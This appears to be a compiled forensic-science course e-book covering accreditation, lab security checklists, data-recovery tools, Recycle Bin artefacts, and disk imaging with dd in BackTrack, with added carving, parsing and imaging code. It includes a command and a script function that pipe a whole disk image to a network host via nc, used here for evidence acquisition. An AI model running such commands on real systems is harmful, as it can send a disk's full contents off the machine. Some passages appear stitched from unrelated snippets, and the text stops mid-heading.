Pricing: The university is required to prepare an outline of the courses that are being presented for scrutiny and the component standards that are to be assessed. This document will enable the Society to determine the resources that will be required for the assessment and to provide a pricing statement. The Society needs to know how many courses are to be accredited, at what level (undergraduate or postgraduate), and the extent, if any, of overlap between those courses, e.g. duplication of modules.
Preparing a Matrix: The university will then be required to prepare an in-depth matrix for each course showing how the component standards are met by the course material. The format of this is flexible, but typically consists of a Microsoft Excel document mapping the relevant module codes/titles to each of the component standards, plus a copy of each of the module outlines/handbooks to allow for more detailed scrutiny.
Assessment Visit: An assessment panel consisting of a chair (professor), one academic and one practitioner will scrutinize the documents, inform the university of any other documentation and materials they may wish to consult, and then visit the university to assess the resources available.
Result of Assessment: The Chair of the Accreditation Sub-Committee (ASC) will endeavour to communicate the decision of the assessment panel to the university as soon as practicable, and no later than 2 weeks after the next meeting of the Society's Accreditation Sub-Committee.
Annual Review: This is an important stage in the accreditation process. University courses that receive accreditation will be reviewed on an annual basis by an assessor.
Guide for Course Providers
The service was developed to help establish and maintain standards of education in forensic science, and involves major employers and professional interests. It is the aim of the Society to assist HEIs in achieving these standards by providing access to advice and guidance. Accreditation is based on a series of Component Standards, which address specific areas of forensic practice. They are intended to augment, not replace, the underlying scientific knowledge of the forensic components. For example, the Laboratory Analysis module does not include basic laboratory procedures such as pH measurement, volumetric procedures, or weighing. The standards are therefore the beginnings of an expanded suite that will eventually cover the entire knowledge range within most of the forensic sciences.
Code for each component standard
The following indicates the code for each component standard:
IEPE: Interpretation, Evaluation & Presentation of Evidence
CSI: Crime Scene Investigation
Lab Analysis: Laboratory Analysis
CNERA: Computer Network Evidence Recovery and Analysis
DEARP: Digital Evidence Analysis, Recovery and Preservation
Anth: Forensic Anthropology
Arch: Forensic Archaeology
Computer Forensic Laboratory Checklist Samples
Ensure your lab door locks and you have controlled access to the keys and/or combination.
Ensure your cleaning staff and others do not have access to the facility unless they are properly escorted.
Ensure the walls and ceiling are constructed in such a way that easy access is prevented (e.g. preventing someone from climbing over the wall and dropping through the ceiling).
Ensure protective mechanisms are in place for disastrous events such as fire, flooding, lightning, and other events common to the environment.
Ensure there is a physically secure evidence room or locker within the lab with a separate key or combination lock from the one used to get into the lab.
Ensure there are written policies and procedures for lab controls, evidence controls, forensic examinations, and validation of tools and equipment.
Ensure a formal case management system is in place.
Ensure there is a network connection for Internet access that is separate from the forensic examination computer.
Ensure the forensic examination computer is isolated from the network.
Make certain there is a central place to store documents. It could be in the evidence room or locker if it's large enough and fits your storage needs.
Ensure there is a designated document librarian for centralized and consistent control of case data.
Ensure there is a standard validated field kit including the hardware and software tools you use the most in your investigations.
Ensure you have extra copies of forms, like Chain of Custody forms and Evidence Receipts.
Ensure your hardware and storage are consistent with the environment you commonly investigate, including access to special equipment, extra drives and other needed media.
Ensure you have hardware and/or software tools for: write protection; acquisition; data recovery/discovery; Internet history, images and email; password cracking; mobile devices (e.g. PDA/cell phone); malware/virus detection; binary analysis; large storage analysis; multifunction use (e.g. EnCase, Paraben tools, FTK, SMART).
LABORATORY EXAMINATIONS
Any anti-contamination precautions or requirements of the particular case (e.g. the presence of narcotics, poisons, explosives, etc.) must be considered before any examination proceeds, and the minimum precautions necessary identified and then implemented. All items submitted for forensic examination should first be examined for the integrity of their packaging. Any deficiency in the packaging which may compromise the value of a laboratory examination should be grounds for refusal to carry out the laboratory examination. All personnel involved in examinations of computer systems should take adequate precautions to minimize any risks from electrical hazards or static; some items also need to be protected from electrostatic discharge (ESD). Teams engaged in the recovery of digital evidence should maintain a set of written procedures particular to their requirements, but within the broad framework of an accepted national or international standard. In the UK, law enforcement agencies can follow the principles documented in the ACPO Good Practice Guide for Computer Based Evidence, and procedures should be available describing how these principles are followed. The relevant local procedures manual should be specific, comprehensive and understood by all members of staff in that unit. Laboratory examinations should be supported by the following records: case records; analysis protocols.
HEALTH AND SAFETY in digital forensic
Health and safety considerations are extremely important in all of the work carried out at all stages of the forensic process. Personnel engaged in the examination of various forms of digital technology should operate in accordance with the regulations of the pertinent government, environmental and safety authorities and with laboratory policy. General laboratory safety manuals should be available to all laboratory personnel. These should contain details of how to conduct a risk assessment and how to develop safe systems of work, both at the scene of the incident and in the laboratory. The risks identified, including working with large quantities of offensive material, and the associated safe systems of work should be communicated to all personnel likely to be exposed to the risks. This is especially important when this group includes non-scientists or members of the public (e.g. in court). The relevant safe systems of work should be documented as an integral part of all standard operating procedures. Laboratory personnel should be responsible for maintaining their assigned work areas in a safe, clean and orderly manner. Appropriate safety equipment, as outlined in the various procedures, should be made available near the work sites by the laboratory management; it is the responsibility of the laboratory personnel to use it where required. All staff should be instructed on how to proceed in the event of fire, bomb threats, spillage of hazardous chemicals, electrical accidents, etc., and all should be required to practise these procedures once a year. These practice exercises should be documented. A designated person should be trained and competent to render "qualified first aid" to those doing casework involving digital technology.
Introduction to COMPLAINTS PROCEDURE
Complaints, possible miscarriages of justice and other anomalies need to be reviewed to identify major issues and trends, which are then brought to the attention of senior management for action.
COMPLAINTS PROCEDURE
The parent laboratory or organisation should investigate all complaints made by any providers of casework or others (e.g. courts), as well as any anomalies relating to the services provided which are brought to its attention. Where appropriate, the audit process will be used to assess the extent of any underlying problems. All customer complaints should be dealt with as quickly, efficiently and effectively as possible. The process should aim to resolve misunderstandings and correct errors, where possible. All complaints should be recorded and investigated either by local or senior management, as appropriate. Where necessary, corrective actions are taken to prevent recurrence of the problem. Any anomaly which could affect the validity of any results or materials supplied to customers will be dealt with promptly through an improvement and corrective action procedure. All members of staff are responsible for taking prompt action on any such anomaly which comes to their notice and ensuring that possible implications are reported. The appropriate level of management should ensure that corrective action includes advising customers, recalling reports or items, and retesting or reissuing reports as appropriate. If such an anomaly is recognized specifically as a result of a proficiency test or Quality Assurance Trial, the local procedures described in the QMS should be followed with, wherever possible, a time limit applied for resolving the matter. Any possible miscarriage of justice brought to the attention of a laboratory, either by an external body or by a member of staff, must be dealt with immediately in accordance with local QMS procedures covering Possible or Alleged Miscarriages of Justice.
REFERENCES
The following are the references for health and safety procedures in digital forensics:
Interpol Computer Crime Manual, 1992-2001.
ACPO Good Practice Guide for Computer Based Electronic Evidence, Issue 5, 2008.
UNIT - 7 Acquiring Data, Duplicating Data, and Recovering Deleted files
Digital forensics
Digital forensics is a branch of forensic science, sometimes known as digital forensic science, encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover the investigation of all devices capable of storing digital data.
Digital forensics software
The following are digital forensics software products: Forensic Toolkit (FTK); Mobile Phone Examiner Plus (MPE+); AD Lab; AD Enterprise; Silent Runner; Mobile; Digital Decryption; AD Triage; Live Response.
Overcome case backlog with distributed processing and large-scale, real-time collaboration. Built on FTK® technology, AD Enterprise allows you to investigate thousands of computers simultaneously from a remote location. With deep-dive analysis of both volatile/memory and static data, as well as batch remediation, it is a valuable incident response and enterprise investigations solution.
Silent Runner network forensics software operates like a surveillance camera on your network: monitor, capture and replay network communications for investigations and incident response.
Locked out? Get back in. Password Recovery Toolkit® and Distributed Network Attack® are relied on by Fortune 500 corporations, law enforcement and government agencies to recover passwords from more than 100 applications. Our decryption software is "The Key to Cracking It®".
AD Triage is a portable solution that allows on-scene forensic acquisition of volatile and static data. It can be used on both live and shut-down computers, making it the ideal solution for field examiners, first responders and even non-technical personnel.
Live Response is a USB key that enables first responders, investigators and IT security professionals to collect live volatile data, which would be lost once the computer system is shut down.
Investigation Tools
The following are digital forensic investigation tools for system admins: SANS SIFT; ProDiscover Basic; Volatility; The Sleuth Kit (+Autopsy); FTK Imager; Linux 'dd'; CAINE; Oxygen Forensic Suite 2013 Standard; Free Hex Editor Neo; Bulk Extractor; DEFT; Xplico; LastActivityView; Digital Forensic Framework; Mandiant RedLine; PlainSight; HxD; HELIX3 Free; NetSleuth; P2 eXplorer Free.
Digital Forensics Framework
Digital Forensics Framework (DFF) is free and open source computer forensics software, built on top of a dedicated Application Programming Interface (API).
Data
Data are manipulated either as values or variables by encoding them into information. Data which are derived through reason, or which are employed in the course of behaving, are collectively called knowledge. Data are typically the results of measurements and can be visualized as graphs or images.
Datum: Datum means "an item given". In cartography, geography, nuclear magnetic resonance and technical drawing it often refers to a reference datum from which distances to all other data are measured.
Meaning of data: Data are extracted from information, and knowledge is derived from data. Data are collections of information; through information we acquire knowledge.
Data vs Information: Beynon-Davies uses the concept of a sign to distinguish between data and information: data are symbols, while information occurs when the symbols are used to refer to something.
Recover lost or deleted files
Lost or deleted files can be recovered with free undelete software. Some of the best free undelete software is as follows: Recuva Free; Undelete 360; MiniTool Partition Recovery; Wise Data Recovery.
Recuva Free
Conveniently available in a portable version, Recuva Free is very easy to use. A wizard asks you what type of files you're looking for, and where to search, then scans your system at speed (FAT, exFAT and NTFS file systems are supported). Any files found are listed (with previews for images), and you can restore anything you need in a couple of clicks.
Undelete 360
Undelete 360 is the free version of a commercial product, and so leaves out some useful features (file filtering, previews and so on). These still appear in the interface, though, and suggest you upgrade if you ever click on them, which can be annoying. There are no restrictions on the amount or size of the files you can recover, though, and otherwise the program is very simple to use: point it at a drive, it'll scan for deleted files, then you can view particular file types (JPGs, PDFs, videos and more) by choosing them from a tree. Scanning speed isn't great, but Undelete 360 can recover files that other programs miss, and so it's definitely worth considering.
MiniTool Partition Recovery
Standard undelete programs are perfect for recovering a few files, but if you've lost an entire partition then you'll probably benefit from a specialist application like MiniTool Partition Recovery. The free (for personal use) program has a wizard-based interface, which makes it very straightforward to use. Point MiniTool Partition Recovery at the problem drive, specify the area to be searched, and it'll scan for the missing partition. A report will let you know what the program has found, and you can recover the partition in a few seconds. You don't get a bootable recovery disc here, so if your system partition is damaged then MiniTool Partition Recovery won't help you very much. Otherwise, though, it provides a quick and easy way to locate and restore lost partitions.
Wise Data Recovery
It's hard to imagine how any undelete tool could be simpler than Wise Data Recovery. There are no menus, no complicated options or dialog boxes: all you do is choose a drive, click Scan, and wait as the program locates any deleted files. Select what you need, click Recover, and that's just about it.
Wise Data Recovery doesn't seem to work with FAT-based drives, though, recovering nothing from our test USB drive. It's only free for personal use, too. But if you just need something quick and easy to recover files from NTFS drives then it should probably be on your shortlist.
How to Restore a Deleted Partition
There are three steps to restore a deleted partition.
Step 1: Scan the hard disk for deleted partitions.
Step 2: Select the partition and open the "Restore Partition" dialog.
Step 3: Set the restore options in the "Restore Partition" dialog and run the restore.
Stellar Phoenix Partition Recovery: Professional partition recovery software that works impressively to accomplish the process of recovering lost, deleted, or inaccessible data on Windows-based drives and removable media.
Key features of Stellar Phoenix Partition Recovery: recovers mission-critical files from Windows hard drives and supported external media; a 'Raw Recovery' feature to recover files from severely corrupt media; recovers deleted emails in MS Outlook and Outlook Express; recovers files from damaged or corrupt optical media; support for a broad range of file types, including documents, photos, and multimedia files.
Salient features of this Windows recovery tool: Drive Recovery; Lost Partition Recovery; Raw Recovery; Optical Media Recovery; Pre-Recovery Preview of Files.
Advanced tools: System Startup Disc; SMART; Image Your Hard Disk.
Data Recovery software
Stellar Phoenix Linux Data Recovery is data recovery software that helps you recover lost or inaccessible data from any Ext4, Ext3, Ext2, FAT32, FAT16 or FAT12 file system based Linux volume. It recovers all your lost files, directories, and hard drive volumes, from all available hard drive types, including SCSI, SATA, EIDE, and IDE, through a user-friendly interface; no technical expertise is required.
Free Utilities
S.M.A.R.T.: a feature that monitors the health status of the hard drive and issues warning messages intelligently.
Drive Imaging: imaging of the entire hard drive, volumes or any selected region.
Hard drive cloning: makes an exact replica of the hard drive.
Features of the Linux recovery software: Deleted File Recovery; Quick Recovery; Advance Recovery; Lost or Deleted Volume Recovery; Allows Scanning for Specific File Types; Mask to Narrow Scan Result; Provides Preview of Recoverable Files; Find Required Files and Perform Selective Recovery; Resume Recovery from Saved Image or Scan Information; Saves Recovered Files to any Location; Allows Compressing Recovered Files; Disk Imaging; Drive Cloning; SMART.
Deleted File Recovery
Stellar Linux recovery software efficiently recovers all your accidentally or intentionally deleted documents, photos, audio, video, and other multimedia files. When recovering deleted files from FAT file system based volumes, the software provides two different scanning methods, 'Quick Scan' and 'Deep Scan'. Deep Scan takes relatively more time, but yields a better chance of file recovery.
Quick Recovery
With the 'Quick Recovery' option of the software, you can recover lost data by scanning any volume or a previously saved image of the volume. This recovery method is significantly faster, and efficient enough to recover almost all your data.
Advance Recovery
The 'Advance Recovery' option of the software helps recover all your lost, deleted, or inaccessible data by performing an extensive search operation on the selected volume or its image file. This recovery option is comparatively slower than Quick Recovery, but gives a better chance of recovering lost files.
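The 'Raw Recovery', 'Deep Scan' and 'Advance Recovery' options described above all rest on signature-based carving: when a file's directory entry is gone, the file is located by scanning every byte of the volume for known header and footer patterns. Below is an added example of that technique (not the vendor's code) over a constructed image; it also shows the usual failure mode, a header whose data and footer have been overwritten, and hashes each carved file so it can be verified later.

```python
import hashlib

# Well-known header/footer byte signatures (magic numbers) for a few file types.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "pdf": (b"%PDF-", b"%%EOF"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
}
MAX_CARVE_SIZE = 10 * 1024 * 1024   # stop looking for a footer beyond this distance

# Constructed image: two intact JPEGs, a PDF, and a JPEG header whose data and
# footer were overwritten (the fragment a deep scan finds but cannot recover whole).
SAMPLE_IMAGE = (
    b"\x00" * 32
    + b"\xff\xd8\xff\xe0photo-one\xff\xd9"         # JPEG at offset 32
    + b"\x00" * 16
    + b"%PDF-1.4\nconstructed body\n%%EOF"         # PDF at offset 63
    + b"\x00" * 8
    + b"\xff\xd8\xff\xe0photo-two\xff\xd9"         # JPEG at offset 102
    + b"\x00" * 40
    + b"\xff\xd8\xff\xe1fragment"                  # orphan header at offset 157
    + b"\x00" * 64
)


def carve(image, signatures=SIGNATURES, max_size=MAX_CARVE_SIZE):
    """Header/footer carving over a raw image.

    Returns (files, orphans): files is a list of (type, offset, data) sorted by
    offset; orphans lists (type, offset) for headers with no footer within
    max_size, which still prove a file of that type once existed there.
    Limitation of the technique: if an orphan header precedes an intact file of
    the same type, the two run together and are carved as one (over-long) file.
    """
    files, orphans = [], []
    for ftype, (head, tail) in signatures.items():
        pos = 0
        while True:
            start = image.find(head, pos)
            if start < 0:
                break
            end = image.find(tail, start + len(head), start + max_size)
            if end < 0:
                orphans.append((ftype, start))
                pos = start + 1          # keep scanning past the orphan header
                continue
            end += len(tail)
            files.append((ftype, start, image[start:end]))
            pos = end
    return sorted(files, key=lambda f: f[1]), orphans


def manifest(files):
    """'type offset size sha256' per carved file, for the findings report."""
    return [
        f"{ftype} 0x{off:08x} {len(data)} {hashlib.sha256(data).hexdigest()}"
        for ftype, off, data in files
    ]


if __name__ == "__main__":
    carved, lost = carve(SAMPLE_IMAGE)
    print("\n".join(manifest(carved)))
    for ftype, off in lost:
        print(f"orphan {ftype} header at 0x{off:08x}: footer not found")
```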
Deleted Volume Recovery
This Linux data recovery software provides an option to search for and list all lost or deleted volumes in the system. The software finds all ext4, ext3, ext2 and FAT file system based volumes which have been completely deleted from the hard drive, and allows recovering data from them using the Quick Recovery, Advance Recovery, or Deleted File Recovery method.
Scanning for Specific File Types
The software allows you to scan only for selected file types. Apart from this, the software provides options to add new file types to the list, edit an existing file type, and remove file types from the list.
Narrow Scan Result
The 'Mask' option of the software helps you narrow down the entire scan result. Once the scanning process is complete, you can apply a mask to the scan list to create a new tree containing only your required file types. The software provides several masking options, including 'File of type', 'Size from' (KB), and Date.
Preview of Recoverable Files
After the scanning operation completes, this Linux data recovery software shows a preview of all recoverable files in the selected volume, so that you can judge the chances of recovery. You can click a file in the scanned list and preview it in the upper pane of the interface.
Find Required Files
With the 'Find' option in Stellar Linux recovery, you can locate the required files and perform selective recovery. This option gives several sub-options to search only for the files you need from the large pool of scanned files and recover them.
Resume Recovery from Saved Image
The software allows you to save the scan information and resume the recovery operation at any time in the future, from any previously saved scan information or image file of the drive.
Saves Recovered Files
Stellar Phoenix Linux Data Recovery allows you to save the recovered files to any storage media connected to the system. You can save the recovered data onto your local disk or any File Transfer Protocol (FTP) server.
Recycle Bin
The Recycle Bin is a location, like a folder, where deleted files are temporarily stored. It can be found on PCs and on laptops. The Recycle Bin allows users to recover files that have been deleted in Windows. By default, Microsoft Windows 95 and above uses 10% of available disk space to save deleted files, so that a file which is accidentally deleted can be recovered from the Recycle Bin.
View deleted files in the Recycle Bin: If any file has been deleted in Windows, it is automatically moved to the Recycle Bin. Users can identify whether files are in the Recycle Bin by looking at the Recycle Bin icon. By default, the icon shows an empty Recycle Bin; when files have been deleted, the icon shows a Recycle Bin full of trash. If the Recycle Bin is full, users can view the files in it by double-clicking the Recycle Bin icon.
Manage the Recycle Bin: If you want to modify how much space Windows uses to store deleted files, for all drives or independently, right-click the Recycle Bin icon and click Properties. In the Recycle Bin Properties window, you can adjust how much space the Recycle Bin takes by dragging the slider left or right, or completely disable the Recycle Bin feature.
Empty the Recycle Bin: To empty the Recycle Bin, right-click the Recycle Bin icon, then click Empty Recycle Bin.
How to know the Recycle Bin is empty: When the Recycle Bin is empty it shows an icon of a Recycle Bin with no trash, and an icon with trash when it still holds files. Also, when empty, the message "This folder is empty" is shown when you open the Recycle Bin.
Should I empty the Recycle Bin? If you feel that none of the files in the Recycle Bin will ever need to be restored, it's recommended you empty the Recycle Bin at your convenience.
When should I empty the Recycle Bin? Any time you want to clean up the contents of your hard drive, or when you're running out of disk space, it's recommended you empty the Recycle Bin.
View and recover files from the Recycle Bin: To view or recover files from the Recycle Bin, use the right mouse button.
Recovering a deleted file from the Windows Recycle Bin: Go to the Desktop where you can see the Recycle Bin icon. If there are any files in the Recycle Bin, the icon should appear with trash in the bin. Double-click the Recycle Bin icon to open the window displaying all files in the Recycle Bin. If no files are seen, skip to the paragraph below. To restore any of the deleted items, highlight the files you want to restore, right-click the file and then select the Restore option. This will restore the file to the original location it was deleted from.
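Restore works because Windows keeps a small record for every file in the Recycle Bin holding its original path, size and deletion time. On Windows Vista and later each deleted file lives under $Recycle.Bin in a per-user (SID) subfolder as a pair: $R followed by a random id (the content) and $I with the same id (the record). An examiner reads these $I records to see what was deleted and when, and they are often still found in unallocated space after the bin has been emptied. The following added parser (not code from the course material) handles both record versions; the layout in the comments is Windows's own and is not described in the text above, and the sample records are constructed.

```python
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)   # FILETIME zero point


def filetime_to_datetime(ft):
    """Windows FILETIME: 100-nanosecond ticks since 1601-01-01 00:00 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return int((dt - FILETIME_EPOCH) / timedelta(microseconds=1)) * 10


def parse_recycle_bin_record(data):
    """Parse a $I record.

    Layout (little-endian): 8-byte version, 8-byte original file size, 8-byte
    FILETIME of deletion, then the original path in UTF-16LE: a fixed 520-byte
    NUL-padded field in version 1 (Vista to 8.1), or a 4-byte character count
    (including the terminating NUL) followed by the path in version 2 (Windows 10
    and later).
    """
    if len(data) < 24:
        raise ValueError("record shorter than the 24-byte header")
    version, size, ft = struct.unpack_from("<qqq", data, 0)
    if version == 1:
        raw_path = data[24:24 + 520]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)
        raw_path = data[28:28 + 2 * nchars]
    else:
        raise ValueError(f"unsupported $I version {version}")
    path = raw_path.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
    return {"version": version, "size": size,
            "deleted": filetime_to_datetime(ft), "path": path}


def build_record(version, path, size, deleted):
    """Build a $I record; used here only to construct sample data."""
    header = struct.pack("<qqq", version, size, datetime_to_filetime(deleted))
    if version == 1:
        return header + path.encode("utf-16-le").ljust(520, b"\x00")
    return header + struct.pack("<I", len(path) + 1) + (path + "\x00").encode("utf-16-le")


# Constructed sample records (not taken from a real system).
SAMPLE_DELETED = datetime(2015, 8, 17, 9, 30, 0, tzinfo=timezone.utc)
SAMPLE_RECORD_V2 = build_record(2, r"C:\Users\analyst\Documents\ledger.xlsx", 40960, SAMPLE_DELETED)
SAMPLE_RECORD_V1 = build_record(1, r"D:\cases\notes.txt", 1024, SAMPLE_DELETED)

if __name__ == "__main__":
    for rec in (SAMPLE_RECORD_V1, SAMPLE_RECORD_V2):
        print(parse_recycle_bin_record(rec))
```

The deletion time is stored in UTC, so convert it to the case's time zone before it goes into a report.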
Trash
Trash (computing) is the means by which operating systems dispose of unwanted files; it is called the "Recycle Bin" on Microsoft Windows. Trash (video game) is an RTS with multiplayer matches of up to 32 players competing on a single map.
Implementations
Mac OS and Mac OS X, with the Macintosh Finder, as "Trash" (or "Wastebasket" in some defunct localizations).
Microsoft Windows, with Windows Explorer, as "Recycle Bin".
GNOME (Linux), with Nautilus.
KDE (Linux), with Konqueror and Dolphin.
Xfce (Linux), with Thunar.
In Microsoft Windows
A file can be sent to the Recycle Bin in several ways:
Right-clicking the file and selecting Delete from the menu.
Selecting the file and pressing the Delete key.
Selecting Delete from the Task pane in Windows XP.
Selecting the file and choosing Delete from the File menu (in Windows XP Explorer).
Dragging and dropping the file onto the Recycle Bin icon.
From the Send To menu.
From a context-menu command or some other function in a software application; this is usually configurable.
Compressing Recovered Files
This Linux partition recovery software provides an option to save the recovered files in a compressed ZIP folder. With this option you can either compress each file individually or compress all the files into a single ZIP folder.
Bonus Tools
Stellar Linux Data Recovery software provides a few useful utilities as bonus tools, which can be very helpful in protecting your data against an impending drive failure.
Disk Imaging
The software provides an option to create and save an image file of your hard disk or of any selected volume. The image file of your media can help you recover all your data in case of volume corruption, deletion, or formatting of the media.
Drive Cloning
With Stellar Linux Data Recovery you can create an exact replica of your hard drive, which can help you recover lost data in case of drive failure. With the cloned copy of your hard drive you can also carry on your ongoing work without any delay waiting for data recovery.
SMART
With the 'SMART' feature, the software continuously monitors important parameters of the hard drive and generates warning messages about any impending drive failure. SMART helps you protect your data from unexpected hard drive failure.
Recover deleted files
Open the Stellar Phoenix Linux recovery software. All the drives physically connected to the system are shown in the left-hand panel, and the logical drives are listed under this section of the software. Double-click the logical drive from which you want to recover the deleted data, then click the 'Deleted File Recovery' icon.
The software scans and displays all the recoverable files in the tree view. Check-mark the files that you want to recover and click the 'Recover Selected' icon, or select 'Recover Selected' from the File menu. Select the destination folder where you want to save the recovered files. Make sure you do not recover the files onto the same drive from which you are recovering the data. Then click 'OK'.
Recover data from a pen drive
Open the Stellar Phoenix Linux Data Recovery software. All the drives physically connected to the system are shown in the left-hand panel, and the logical drives are listed under this section of the software. Double-click the logical drive from which you want to recover the formatted data and click the 'Advance Scan' icon. The software scans and displays all the recoverable files in the tree view. Click 'Recover All' and select the destination folder where you want to save the recovered files. Make sure you do not recover the files onto the same drive from which you are recovering the data. Then click 'OK'.
Recover data from a deleted partition
Open the Stellar Phoenix Linux Data Recovery software. All the drives physically connected to the system are shown in the left-hand panel, and the logical drives are listed under this section of the software. Double-click the physical disk displayed in the left pane. Click the first icon, i.e. Search for logical drives, then select 'Advance Search'. As soon as you click the icon, the software starts searching for the lost logical drives. When the search is complete, all the lost drives on the disk appear in the left pane in the tree view under the physical disk.
Then double-click the standard/advance drive from which you have to recover the lost data and click the 'Advance Scan' icon. The software scans and displays all the recoverable files in the tree view. Click 'Recover All', then select the destination folder where you want to save the recovered files. Make sure you do not recover the files onto the same drive from which you are recovering the data. Then click 'OK'.
UNIT - 8 Forensic Discovery and Analysis Using Back Track
Forensic Discovery and Analysis Using Back Track 8/17/2015
Introduction to Forensic tools
The main forensic tools covered here are the image-acquiring tools: dd and, alongside it, dd_rescue, dcfldd, aimage, afconvert, afinfo and afcat.
Image-acquiring tools
These tools take an exact bit-by-bit replica (image) of the digital media identified for forensic investigation, without altering the content of the media at all. Acquiring an image of the suspect media lets you analyse it on a high-end workstation that can meet the resource requirements of extensive forensic analysis tools. Working with an image also keeps the original media undisturbed and unaltered by any of the analysis activity.
Some important image-acquiring tools
Here is a list of some of the important image-acquiring tools available in BackTrack. dd is the popular Linux command-line utility for taking images of digital media such as a hard drive, CD-ROM drive, USB drive, etc., or of a particular partition of the media.
Raw images
Images created using dd-like utilities are called raw images. These are bit-by-bit copies of the source media, without any additions or deletions.
Examples of dd
dd if=/dev/sdc of=image.dd
dd if=/dev/sdc1 of=image1.dd
The first example, dd if=/dev/sdc of=image.dd, takes an image of the whole disk (sdc), including the boot record and the partition table. The second example, dd if=/dev/sdc1 of=image1.dd, takes an image of a particular partition (sdc1) of the disk (sdc). A partition image can be mounted via the loop device.
dd over the network
Instead of storing the image contents in a file, you can pipe the data to a host on the network using a tool such as nc; this is useful when you have space constraints for the image file.
dd if=/dev/sdc | nc 192.168.0.2 6000
In this example, the contents of the image are sent over TCP port 6000 to the host 192.168.0.2, where you run nc in listening mode as nc -l 6000 > image.dd to store the received image contents in the file image.dd.
Limitations of dd
However, dd has limitations where the media to be imaged has errors in the form of bad sectors. A more advanced version of dd, named dd_rescue, is available in BackTrack and is used to image a drive that is suspected to have one or more bad sectors.
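As an added example (not part of the e-book or of BackTrack), the dd workflow above as a small shell script: acquire a raw image, verify it against the source by hash as an examiner would, and carve one partition out of a whole-disk image by sector offset. It assumes a constructed file standing in for /dev/sdc, SHA-256 via sha256sum or shasum, and the function names are the example's own.

```shell
#!/bin/sh
# Added example, not from the e-book: an acquisition-and-verification workflow
# around dd. The "device" is a constructed file, because imaging /dev/sdc needs
# root and a real disk; pass a real block device path instead in practice.

# hash_of FILE: print a SHA-256 digest (sha256sum on Linux, shasum elsewhere)
hash_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# make_test_media PATH: constructed stand-in for /dev/sdc, 4 MiB of random
# bytes (8192 sectors of 512 bytes)
make_test_media() {
    dd if=/dev/urandom of="$1" bs=1024 count=4096 2>/dev/null
}

# acquire_image SRC DST: raw bit-for-bit copy, like "dd if=/dev/sdc of=image.dd".
# conv=noerror keeps dd going when a read fails (a bad sector); conv=sync pads
# that block with zeros so later offsets still line up with the source. This is
# all dd can do about bad sectors, which is why the text points to dd_rescue.
# bs=512 matches the sector size, so sync never pads a whole-sector source.
acquire_image() {
    dd if="$1" of="$2" bs=512 conv=noerror,sync 2>/dev/null
}

# verify_image SRC DST: hash source and image and succeed only if they match.
# Record both digests in the acquisition notes; the source digest is what a
# later examiner compares the working copy against.
verify_image() {
    src_hash=$(hash_of "$1")
    img_hash=$(hash_of "$2")
    printf 'source %s\nimage  %s\n' "$src_hash" "$img_hash"
    [ "$src_hash" = "$img_hash" ]
}

# extract_partition IMAGE OUT START_SECTOR SECTOR_COUNT: carve one partition
# out of a whole-disk raw image by sector offset, yielding the same bytes that
# "dd if=/dev/sdc1 of=image1.dd" reads from the live partition. Take START and
# COUNT from the partition table (e.g. "fdisk -l image.dd").
extract_partition() {
    dd if="$1" of="$2" bs=512 skip="$3" count="$4" 2>/dev/null
}

# send_image_over_network SRC HOST PORT: the nc variant from the text. The
# receiving host runs "nc -l PORT > image.dd" first, then hashes the received
# file. Not exercised below because it needs a listener.
send_image_over_network() {
    dd if="$1" bs=512 conv=noerror,sync 2>/dev/null | nc "$2" "$3"
}

# Stand-alone demo on the constructed media, run only when DD_DEMO=1 is set.
if [ "${DD_DEMO:-0}" = 1 ]; then
    work=$(mktemp -d)
    make_test_media "$work/sdc"
    acquire_image "$work/sdc" "$work/image.dd"
    verify_image "$work/sdc" "$work/image.dd" && echo "image verified"
    extract_partition "$work/image.dd" "$work/part1.dd" 2048 4096
    rm -rf "$work"
fi
```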
aimage
aimage is an Advanced Forensic Format (AFF) imaging tool with intelligent error recovery, compression and verification. AFF is an extensible open format for the storage of disk images and related forensic metadata.
The ability to store relevant metadata such as the serial number of the drive, the date of imaging, etc. inside the image itself is a huge advantage; this is not possible with raw imaging tools such as dd.
afcat
afcat is a command-line utility that prints the various contents of an AFF image file. Basic usage is afcat with one of the following options:
-p: output the data of a given page number.
-S: output the data of a given sector (sector size 512 bytes).
-l: output all segment names.
-L: output all segment names, arg and segment length.
AIR Imager
AIR (Automated Image and Restore) is a GUI front-end for dd/dcfldd. It offers the following features:
Use of either dd or dcfldd.
Auto-detection of IDE and SCSI drives, CD-ROMs and tape drives.
Image compression via gzip/bzip2.
Image verification via MD5 or SHA1.
Imaging over a TCP/IP network.
Splitting images into multiple files.
Writing zeros to a drive/partition.
Creating a large image file filled with zeros.
Customization of source and destination devices/files.
Skipping of certain bytes of the source and destination.
Introduction of forensic analysis
Forensic analysis is the use of controlled and documented analytical and investigative techniques to identify, collect, examine and preserve digital information.
Forensic analysis
Secure State provides a thorough approach to the forensic methodology and ensures that all tools, methodologies and processes are forensically sound, so that the evidence is unaltered. Secure State works as an extension of the corporation's response team, helping to ensure relevant and efficient analysis for three primary areas of forensics: Evidence Acquisition, Evidence Analysis and Evidence Reporting.
Forensic acquisition process
Computer forensics acquisition is the process of acquiring electronic evidence in a manner that preserves the data and maintains the chain of custody. Secure State establishes tested and proven acquisition methodologies, information gathering and structured reporting of security-related events. Electronic evidence contains the information needed to understand how the events happened, which resources or data may have been affected, and the mitigation strategies. It is essential that electronic evidence is acquired in a methodical, safe and secure manner.
Collecting evidence
All evidence collection procedures are reviewed by Secure State's Incident Response Team before acquisition begins. This is an important step that also shapes the forensic analysis. As deemed appropriate, Secure State is the custodian of data and the handler for response, evidence collection and retention, and data or device analysis. All imaging, data collection and documentation will be observed and supervised by a Secure State Lead Investigator.
Primary scope
